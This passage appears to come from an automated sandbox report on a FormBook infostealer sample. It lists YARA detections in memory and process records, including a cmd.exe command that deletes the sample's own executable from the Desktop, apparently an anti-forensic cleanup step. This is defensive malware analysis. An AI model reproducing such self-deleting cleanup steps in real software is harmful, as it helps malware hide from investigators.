                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:moderate

                                                    General

                                                    Target ID:13
                                                    Start time:20:59:09
                                                    Start date:28/01/2022
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
                                                    Imagebase:0xd80000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Target ID:14
                                                    Start time:20:59:11
                                                    Start date:28/01/2022
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7f20f0000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Disassembly

                                                    No disassembly